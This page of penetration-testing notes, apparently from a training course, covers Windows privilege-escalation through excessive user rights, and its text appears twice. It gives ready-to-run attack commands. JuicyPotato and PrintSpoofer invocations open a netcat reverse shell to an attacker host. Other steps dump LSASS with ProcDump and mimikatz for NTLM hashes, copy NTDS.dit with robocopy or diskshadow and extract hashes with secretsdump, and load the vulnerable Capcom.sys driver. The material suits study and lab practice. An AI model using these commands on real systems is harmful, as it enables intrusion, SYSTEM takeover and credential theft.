Excessive User Rights Abuse

PreviousEnumerating Attack Vectors NextBuilt-in Groups Abuse

Last updated 13 days ago

Excessive User Rights Abuse

Disclaimer - Disabled Rights

User privileges can be assigned but disabled.
Some of them can be re-enabled using scripts or commands depending on the privilege.

SeImpersonate & SeAssignPrimaryToken - JuicyPotato & Printspoofer

These privileges can be used to trick a process running as SYSTEM to connect to the exploit process, handing over the token to be used.
In other words, whenever a user has one of these privileges, it's possible to get privilege escalation by impersonating NT AUTHORITY\SYSTEM

Escalating Privileges with JuicyPotato

Download juicypotato and nc.exe on the target machine
Check CLSIDs:
1. Use systeminfo to get the OS version
2. Select the right list according to the OS Version from
3. Download the test_clsid.bat file from the
4. Run test_clsid.bat and wait, then check the result.log file
5. Inside that log file you will find different CLSIDs.
6. Look for a CLSID with SYSTEM privileges
Start a netcat listener on the attacker machine: nc -lvnp 4444
Run JuicyPotato: .\juicypotato.exe -l SAMEPORT -c CLSID_SYSTEM_FROM_RESULTS -p c:\windows\system32\cmd.exe -a "/c c:\users\public\desktop\nc.exe -e cmd.exe attacker-ip SAME-LISTENING-PORT" -t *
Disclaimer/Troubleshooting: the listening netcat port and the port specified after the -l flag need to be the same in order to get the reverse shell

Escalating Privileges with PrintSpoofer

JuicyPotato doesn't work on Windows Server 2019 and Windows 10 build 1809 onwards.
PrintSpoofer and RoguePotato can be used on them to leverage the same privileges and gain NT AUTHORITY\SYSTEM level access.

We can use the tool to spawn a SYSTEM process in the current console, spawn a SYSTEM process on a desktop (if logged on locally or via RDP), or catch a reverse shell
PoC to get a Reverse Shell:
1. Download printspoofer.exe and nc.exe on the target machine
2. Start a netcat listener on the attacker machine: nc -lvnp 4444
3. Run PrintSpoofer: PrintSpoofer.exe -c "c:\tools\nc.exe attacker-ip netcat-port -e cmd"

SeDebugPrivilege

SeDebugPrivilege determines which users can attach to or open any process, even a process they do not own.
Developers who are debugging their applications DO NOT need this user right.
Developers who are debugging new system components need this user right.
This user right provides access to sensitive and critical operating system components.
This user right can be used to capture sensitive information from system memory, or access/modify kernel and application structures
Sometimes, developer users are assigned the debugprivilege rather than being added to the administrators group, who have this privilege by default

SeDebugPrivilege to Dump LSASS

Use ProcDump to extract a dump of the LSASS process: procdump.exe -accepteula -ma lsass.exe lsass.dmp
Using mimikatz.exe:
- sekurlsa::minidump
- sekurlsa::logonPasswords
- Gain the NTLM Hashes to use for a Pass the Hash attack or to crack them

SeDebugPrivilege to gain Remote Code Execution as SYSTEM

Open an elevated powershell console (e.g. right click on PS and run as admin)
Run tasklist and look for a privileged process (e.g. winlogon.exe) and get its PID
Run the script: .\psgetsys.ps1; [MyProcess]::CreateProcessFromParent(<system_pid>,<command_to_execute>,"")
Alternatively:
1. Import-Module .\psgetsys.ps1
2. ImpersonateFromParentPid -ppid (Get-Process "lsass").Id -command "C:\tools\revshell.exe"

SeTakeOwnershipPrivilege

SeTakeOwnershipPrivilege is a policy setting that determines which users can take ownership of any securable object

Check target file current ownership
- PowerShell: Get-ChildItem -Path 'C:\Path\to\file.txt' | Select Fullname,LastWriteTime,Attributes,@{Name="Owner";Expression={ (Get-Acl $_.FullName).Owner }
- CMD: cmd /c dir /q 'C:\Path\to\file.txt'
- Disclaimer: Sometimes the owner won't show due to lack of permissions
To take ownership of a file: takeown /f 'C:\Path\to\file.txt'
To enable full permissions on a file: icacls 'C:\Path\to\file.txt' /grant htb-student:F

SeBackupPrivilege

A user with SeBackupPrivilege enabled can bypass file and directory, registry, and other persistent object permissions for the purposes of backing up the system.
This will let us copy a file from a folder, bypassing any access control list (ACL).
However, we can't do this using the standard copy command.
Instead, we need to programmatically copy the data, making sure to specify the FILE_FLAG_BACKUP_SEMANTICS flag.
We can use the built-in robocopy tool or the following PoC to copy any file: https://github.com/giuliano108/SeBackupPrivilege

SeBackupPrivilege to Copy any file

Import-Module .\SeBackupPrivilegeUtils.dll
Import-Module .\SeBackupPrivilegeCmdLets.dll
If the privilege is assigned but disabled, use Set-SeBackupPrivilege and verify with Get-SeBackupPrivilege
Copy a file: Copy-FileSeBackupPrivilege 'C:\Confidential\2021 Contract.txt' .\Contract.txt

SeBackupPrivilege to Copy any file with robocopy [Built-in Utility]

Robocopy is a built-in utility that can be used to copy files in backup mode.
No external tools are required
robocopy /B E:\Windows\NTDS .\ntds ntds.dit

SeBackupPrivilege to copy NTDS.dit

The NTDS.dit file is locked by default
We can use the Windows diskshadow utility to create a shadow copy of the C drive and expose it as E drive.
The NTDS.dit in this shadow copy won't be in use by the system.
Then, we can use the Copy-FileSeBackupPrivilege cmdlet to bypass the ACL and copy the NTDS.dit locally.

Follow these steps:

Import-Module .\SeBackupPrivilegeUtils.dll
Import-Module .\SeBackupPrivilegeCmdLets.dll
If the privilege is assigned but disabled, use Set-SeBackupPrivilege and verify with Get-SeBackupPrivilege
Copy the NTDS file: Copy-FileSeBackupPrivilege E:\Windows\NTDS\ntds.dit C:\Tools\ntds.dit
Extract hashes using SecretsDump: secretsdump.py -ntds ntds.dit -system SYSTEM -hashes lmhash:nthash LOCAL

SeLoadDriverPrivilege

This policy setting determines which users can dynamically load and unload device drivers.
This user right is not required if a signed driver for the new hardware already exists in the driver.cab file on the device
Device drivers run as highly privileged code.

Example - Capcom.sys

A typically vulnerable driver to this attack is Capcom.sys, which can allow any user to execute shellcode with SYSTEM privileges
PoC Usage: EOPLOADDRIVER.exe RegistryServicePath DriverImagePath
PoC Usage with CapCom.sys: EoPLoadDriver.exe System\CurrentControlSet\Capcom c:\path-to-downloaded\Capcom.sys

SeSecurityPrivilege

This policy setting determines which users can specify object access audit options for individual resources such as files, Active Directory objects, and registry keys.
These objects specify their system access control lists (SACL).
A user assigned this user right can also view and clear the Security log in Event Viewer.

SeRestorePrivilege

This security setting determines which users can bypass file, directory, registry, and other persistent object permissions when they restore backed up files and directories.
It determines which users can set valid security principals as the owner of an object.

PreviousEnumerating Attack Vectors NextBuilt-in Groups Abuse

Last updated 13 days ago

Disclaimer - Disabled Rights

User privileges can be assigned but disabled.
Some of them can be re-enabled using scripts or commands depending on the privilege.

SeImpersonate & SeAssignPrimaryToken - JuicyPotato & Printspoofer

These privileges can be used to trick a process running as SYSTEM to connect to the exploit process, handing over the token to be used.
In other words, whenever a user has one of these privileges, it's possible to get privilege escalation by impersonating NT AUTHORITY\SYSTEM

Escalating Privileges with JuicyPotato

Download juicypotato and nc.exe on the target machine
Check CLSIDs:
1. Use systeminfo to get the OS version
2. Select the right list according to the OS Version from
3. Download the test_clsid.bat file from the
4. Run test_clsid.bat and wait, then check the result.log file
5. Inside that log file you will find different CLSIDs.
6. Look for a CLSID with SYSTEM privileges
Start a netcat listener on the attacker machine: nc -lvnp 4444
Run JuicyPotato: .\juicypotato.exe -l SAMEPORT -c CLSID_SYSTEM_FROM_RESULTS -p c:\windows\system32\cmd.exe -a "/c c:\users\public\desktop\nc.exe -e cmd.exe attacker-ip SAME-LISTENING-PORT" -t *
Disclaimer/Troubleshooting: the listening netcat port and the port specified after the -l flag need to be the same in order to get the reverse shell

Escalating Privileges with PrintSpoofer

JuicyPotato doesn't work on Windows Server 2019 and Windows 10 build 1809 onwards.
PrintSpoofer and RoguePotato can be used on them to leverage the same privileges and gain NT AUTHORITY\SYSTEM level access.

We can use the tool to spawn a SYSTEM process in the current console, spawn a SYSTEM process on a desktop (if logged on locally or via RDP), or catch a reverse shell
PoC to get a Reverse Shell:
1. Download printspoofer.exe and nc.exe on the target machine
2. Start a netcat listener on the attacker machine: nc -lvnp 4444
3. Run PrintSpoofer: PrintSpoofer.exe -c "c:\tools\nc.exe attacker-ip netcat-port -e cmd"

SeDebugPrivilege

SeDebugPrivilege determines which users can attach to or open any process, even a process they do not own.
Developers who are debugging their applications DO NOT need this user right.
Developers who are debugging new system components need this user right.
This user right provides access to sensitive and critical operating system components.
This user right can be used to capture sensitive information from system memory, or access/modify kernel and application structures
Sometimes, developer users are assigned the debugprivilege rather than being added to the administrators group, who have this privilege by default

SeDebugPrivilege to Dump LSASS

Use ProcDump to extract a dump of the LSASS process: procdump.exe -accepteula -ma lsass.exe lsass.dmp
Using mimikatz.exe:
- sekurlsa::minidump
- sekurlsa::logonPasswords
- Gain the NTLM Hashes to use for a Pass the Hash attack or to crack them

SeDebugPrivilege to gain Remote Code Execution as SYSTEM

Get this on the target system
Open an elevated powershell console (e.g. right click on PS and run as admin)
Run tasklist and look for a privileged process (e.g. winlogon.exe) and get its PID
Run the script: .\psgetsys.ps1; [MyProcess]::CreateProcessFromParent(<system_pid>,<command_to_execute>,"")
Alternatively:
1. Import-Module .\psgetsys.ps1
2. ImpersonateFromParentPid -ppid (Get-Process "lsass").Id -command "C:\tools\revshell.exe"

SeTakeOwnershipPrivilege

SeTakeOwnershipPrivilege is a policy setting that determines which users can take ownership of any securable object

Check target file current ownership
- PowerShell: Get-ChildItem -Path 'C:\Path\to\file.txt' | Select Fullname,LastWriteTime,Attributes,@{Name="Owner";Expression={ (Get-Acl $_.FullName).Owner }
- CMD: cmd /c dir /q 'C:\Path\to\file.txt'
- Disclaimer: Sometimes the owner won't show due to lack of permissions
To take ownership of a file: takeown /f 'C:\Path\to\file.txt'
To enable full permissions on a file: icacls 'C:\Path\to\file.txt' /grant htb-student:F

SeBackupPrivilege

A user with SeBackupPrivilege enabled can bypass file and directory, registry, and other persistent object permissions for the purposes of backing up the system.
This will let us copy a file from a folder, bypassing any access control list (ACL).
However, we can't do this using the standard copy command.
Instead, we need to programmatically copy the data, making sure to specify the FILE_FLAG_BACKUP_SEMANTICS flag.
We can use the built-in robocopy tool or the following PoC to copy any file: https://github.com/giuliano108/SeBackupPrivilege

SeBackupPrivilege to Copy any file

Import-Module .\SeBackupPrivilegeUtils.dll
Import-Module .\SeBackupPrivilegeCmdLets.dll
If the privilege is assigned but disabled, use Set-SeBackupPrivilege and verify with Get-SeBackupPrivilege
Copy a file: Copy-FileSeBackupPrivilege 'C:\Confidential\2021 Contract.txt' .\Contract.txt

SeBackupPrivilege to Copy any file with robocopy [Built-in Utility]

Robocopy is a built-in utility that can be used to copy files in backup mode.
No external tools are required
robocopy /B E:\Windows\NTDS .\ntds ntds.dit

SeBackupPrivilege to copy NTDS.dit

The NTDS.dit file is locked by default
We can use the Windows diskshadow utility to create a shadow copy of the C drive and expose it as E drive.
The NTDS.dit in this shadow copy won't be in use by the system.
Then, we can use the Copy-FileSeBackupPrivilege cmdlet to bypass the ACL and copy the NTDS.dit locally.

Follow these steps:

Import-Module .\SeBackupPrivilegeUtils.dll
Import-Module .\SeBackupPrivilegeCmdLets.dll
If the privilege is assigned but disabled, use Set-SeBackupPrivilege and verify with Get-SeBackupPrivilege
Copy the NTDS file: Copy-FileSeBackupPrivilege E:\Windows\NTDS\ntds.dit C:\Tools\ntds.dit
Extract hashes using SecretsDump: secretsdump.py -ntds ntds.dit -system SYSTEM -hashes lmhash:nthash LOCAL

SeLoadDriverPrivilege

This policy setting determines which users can dynamically load and unload device drivers.
This user right is not required if a signed driver for the new hardware already exists in the driver.cab file on the device
Device drivers run as highly privileged code.

Example - Capcom.sys

A typically vulnerable driver to this attack is Capcom.sys, which can allow any user to execute shellcode with SYSTEM privileges
Download on the target machine:
Download EopLoadDriver and transfer on the target machine:
PoC Usage: EOPLOADDRIVER.exe RegistryServicePath DriverImagePath
PoC Usage with CapCom.sys: EoPLoadDriver.exe System\CurrentControlSet\Capcom c:\path-to-downloaded\Capcom.sys

SeSecurityPrivilege

This policy setting determines which users can specify object access audit options for individual resources such as files, Active Directory objects, and registry keys.
These objects specify their system access control lists (SACL).
A user assigned this user right can also view and clear the Security log in Event Viewer.

SeRestorePrivilege

This security setting determines which users can bypass file, directory, registry, and other persistent object permissions when they restore backed up files and directories.
It determines which users can set valid security principals as the owner of an object.